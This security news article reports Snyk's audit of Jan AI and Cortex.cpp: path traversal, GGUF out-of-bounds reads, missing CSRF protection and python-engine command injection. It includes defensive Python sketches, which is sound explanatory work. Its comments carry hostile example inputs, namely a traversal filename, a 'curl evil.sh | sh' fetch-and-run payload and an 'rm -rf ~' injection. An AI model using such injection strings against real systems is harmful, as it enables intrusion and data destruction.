Critical Security Flaws Discovered in Jan AI, Exposing Systems to Remote Attacks

Bisma Farrukh

Multiple security vulnerabilities have been discovered in Jan AI, an open-source alternative to ChatGPT, that could be exploited by remote, unauthenticated attackers to manipulate users' systems. The warning comes from Snyk, a developer security platform.
Jan AI, developed by Menlo Research, is marketed as a personal assistant that operates offline on desktops and mobile devices. It provides a library of popular large language models (LLMs) and supports extensions for customization. This tool, which has over one million downloads on GitHub, enables users to download and run LLMs locally on their devices, offering full control over the AI without relying on cloud-based hosting services.
Jan AI’s functionality is powered by Menlo’s self-hosted AI engine, Cortex.cpp, which serves as the backend API server and is paired with an Electron application for the user interface. Through Cortex, users can access models from a dedicated hub, including HuggingFace, and import local models stored in the GGUF file format.
Because Jan AI and Cortex are designed to run locally on users' systems, they ship without authentication mechanisms, leaving them open to attack from malicious web pages visited in the user's browser. A security audit conducted by Snyk revealed several critical vulnerabilities.
One major issue was identified in a server file-upload function that lacked proper path sanitization. This flaw could allow a malicious web page to write arbitrary files to the victim's system. In addition, the analysis uncovered out-of-bounds reads in Jan's GGUF parser and an absence of cross-site request forgery (CSRF) protections on the server's non-GET endpoints. Although Cortex implements cross-origin resource sharing (CORS), CORS only controls whether a browser exposes a response to the requesting page; it does not stop the request itself from reaching the server, so these flaws remain exploitable.
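To illustrate the file-upload flaw, here is a minimal Python sketch (not Jan's actual code; the upload directory and function names are hypothetical) showing how an unsanitized filename such as `../../etc/x` escapes the intended upload directory, and how resolving and checking the final path blocks it:

```python
import os

UPLOAD_DIR = "/var/lib/app/uploads"  # hypothetical upload root

def unsafe_save_path(filename: str) -> str:
    # Naive join: a filename containing "../" segments escapes
    # the upload directory entirely.
    return os.path.normpath(os.path.join(UPLOAD_DIR, filename))

def safe_save_path(filename: str) -> str:
    # Resolve the candidate path, then verify it is still
    # contained within UPLOAD_DIR before writing anything.
    candidate = os.path.normpath(os.path.join(UPLOAD_DIR, filename))
    if os.path.commonpath([candidate, UPLOAD_DIR]) != UPLOAD_DIR:
        raise ValueError("path traversal attempt blocked")
    return candidate
```

With the naive join, `unsafe_save_path("../../etc/x")` resolves to `/var/lib/etc/x`, outside the upload root; the checked version raises instead of writing there.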
Furthermore, an attacker could use a cross-origin request to alter the server's configuration and disable CORS entirely. Once that is done, the attacker can read data leaked by the GGUF parser simply by requesting the model's metadata endpoint.
Although the ability to leak data via a crafted GGUF file is notable, Snyk pointed out its limitations. Specifically, the attacker has no control over what gets mapped after the malicious file is processed, making it uncertain whether sensitive data could be exposed in this manner.
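The GGUF out-of-bounds issue belongs to a well-known class of parser bug: a length field read from the file is trusted without validating it against the remaining buffer. A simplified Python sketch (GGUF strings really are prefixed with a little-endian `uint64` length, but this is an illustration, not the Cortex parser) shows the missing check:

```python
import struct

def read_string(buf: bytes, offset: int) -> tuple:
    """Read one length-prefixed string from a GGUF-style buffer."""
    if offset + 8 > len(buf):
        raise ValueError("truncated length field")
    (length,) = struct.unpack_from("<Q", buf, offset)
    offset += 8
    # The check a vulnerable parser omits: a huge length field
    # would otherwise read past the end of the file (or, with a
    # memory-mapped file, pull in adjacent process memory).
    if length > len(buf) - offset:
        raise ValueError("string length exceeds file size")
    data = buf[offset : offset + length]
    return data.decode("utf-8"), offset + length
```

A well-formed entry parses normally, while a crafted file declaring a multi-gigabyte string is rejected instead of triggering an out-of-bounds read.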
Another significant vulnerability was the risk of remote code execution (RCE) via Cortex.cpp's python-engine support. Since the python-engine is a C++ wrapper that executes the Python binary, an attacker who can modify a model's configuration can inject a malicious payload that runs when the model is started, allowing arbitrary code execution on the target system.
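The underlying pattern is generic command injection: a configuration value controlled by the attacker ends up in a command that gets executed. A minimal sketch (hypothetical function names, not Cortex's code) contrasts interpolating the value into a shell command string with passing it as a single argv token, where shell metacharacters lose their meaning:

```python
def run_model_unsafe(python_path: str) -> str:
    # Building a shell command by string interpolation: a config
    # value like "python3; curl evil.sh | sh" would be parsed by
    # the shell as two commands when run with shell=True.
    return f"{python_path} -m model_runner"

def run_model_safe(python_path: str) -> list:
    # Passing an argv list (no shell involved) keeps the value a
    # single token: an embedded ";" is just part of the program
    # name and fails to resolve, rather than spawning a command.
    return [python_path, "-m", "model_runner"]
```

With a payload such as `"python3; rm -rf ~"`, the unsafe variant hands the whole string to a shell, while the safe variant treats it as one (invalid) executable name.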